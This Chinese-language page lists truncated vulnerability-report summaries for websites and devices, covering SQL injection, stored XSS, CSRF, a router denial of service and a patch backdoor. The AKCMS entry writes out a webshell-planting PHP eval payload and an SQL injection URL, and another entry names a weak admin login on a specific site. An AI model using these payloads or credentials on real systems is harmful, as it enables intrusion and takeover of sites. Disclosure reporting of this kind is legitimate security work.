无忧购物系统ASP专业版POST 注入漏洞 - 网站安全关注热度:9

漏洞文件：views.asp先用穿山甲GET注入，然后用POST注入。修复方案：严格过滤..[详情]

桔子酒店储存型xss 可劫持管理员 - 网站安全 - 自关注热度:7

储存型xss，可获得管理的cookies。详细说明：在会员登陆后有个社区管理，里面有我的投诉，可选择酒店进行投诉。投诉相当于留言板，可插入恶意代码。造成储存型xss。由此可以钓到指..[详情]

TL-WR340G无线路由器拒绝服务漏洞 - 网站安全 - 自关注热度:10

TL-WR340G是TP-Link出品的一款轻量级无线路由器，近日有国外黑客发现了这款路由器上的一个拒绝服务漏洞，只要发送一个简单的畸形包到路由器，便可使路由器停止工作，需要手动重启路..[详情]

Magic Quotes禁用危机 - 网站安全 - 自学php关注热度:8

PHP中的魔术引号相信很多人都不陌生了，之前被认为是防御SQL注入以及XSS的一个方法。但是PHP官方决定移除这一特性，理由是因为这一特性对于安全的提升帮助不大，并且十分影响PHP执..[详情]

Web安全性测试之XSS - 网站安全 - 自学php关注热度:11

XSS 全称(Cross Site Scripting) 跨站脚本攻击， 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时，脚本就会在用户的浏览器上执行，从而达到..[详情]

Javascript中XSS的过滤 - 网站安全 - 自学php关注热度:17

对于XSS的过滤，在很多网站中都是说，要过滤双引号，要过滤掉尖括号，这样就安全了。难道真的过滤了双引号和尖括号就完全安全了？在导入到Javascript中的变量中，XSS是有非常多方法..[详情]

虎扑体育网csrf - 网站安全 - 自学php关注热度:15

Web服务器对发送来的请求没有验证来源，就很容易出现csrf攻击。csrf的相关介绍见易踪网的另一篇文章：www.2cto.com/Article/201209/156432.html，由于目标网站没有对发送到服务器的请求做来源验..[详情]

DedeEIMS v1.1暴后台路径 - 网站安全 - 自学php关注热度:12

\include\dialog\config.php//检验用户登录状态$cuserLogin = new userLogin();if($cuserLogin-getUserID()==-1){if($cuserLogin-adminDir==#39;#39;){exit(#39;Request Error!#39;);}$gurl = ../......[详情]

AKCMS后台拿Webshell及修复 - 网站安全 - 自学php关注热度:9

模板中写入以下内{php}fputs(fopen(./0x80c.php,w),?eval(\$_POST[0x80c]);?){/php}然后管理员密码可以注入获取http://www.2cto.com /akcms_keyword.php?sid=11111%27and%28select%201%20from%28select%2.....[详情]

[图解漏洞]解跨站请求伪造（CSRF）原理（之二）关注热度:11

继[图解漏洞]图解跨站请求伪造（CSRF）原理，再整理了一幅图说明CSRF的原理。CSRFCS=Cross Site,跨站，从b.com发起RF=Request Forgery，利用已经验证的a.com的cookie，从b.com向a.com中的某个页面perf..[详情]

HDwiki新漏洞补丁包2012-08-09发现后门代码 - 网站安关注热度:8

HDwiki各版本新漏洞补丁包2012-08-09发现后门代码详细说明：在看补丁包中的reference.php 文件时， 首行并发现了如下不明之处：?php/**词条编辑页面的参考资料*/require_once(dirname(__FILE__)./../j..[详情]

联想移动竞价采购管理系统沦陷 - 网站安全 - 自关注热度:12

很多原因导致站点沦陷的哦！1.站点是这个啦，移动竞价采购管理系统，虽然不知道是什么，但是看起来很牛B的样子http://rat.lenovomobile.com2.管理员密码弱口令啊，直接cs1/cs1登录了，这个..[详情]

phpcms v9 商务中心两个xss - 网站安全 - 自学php关注热度:11

前台菜单没有过滤直接可以写脚本漏洞证明：第二个：..[详情]

猎头网XSS+绕过帐号只能一台电脑登陆限制 - 网站关注热度:7

无意在微博上看到这么一个网站，lietou.com，然后就。。。详细说明：猎头网注册的时候会填入一些公司信息，比如：目前公司，目前职位等，这个地方不用盲打，注册时向这个地方写入..[详情]

漂流瓶：飘来的可能是局长，也可能是XSS - 网站关注热度:15

一只漂流瓶向你飘了过来。。它飘来的可能是对美好生活的向往，可能是对世俗的抱怨，可能是某局长发来的某某某，它，还有可能是XSS！。漂流瓶，作为一项个人认为是娱乐的功能，..[详情]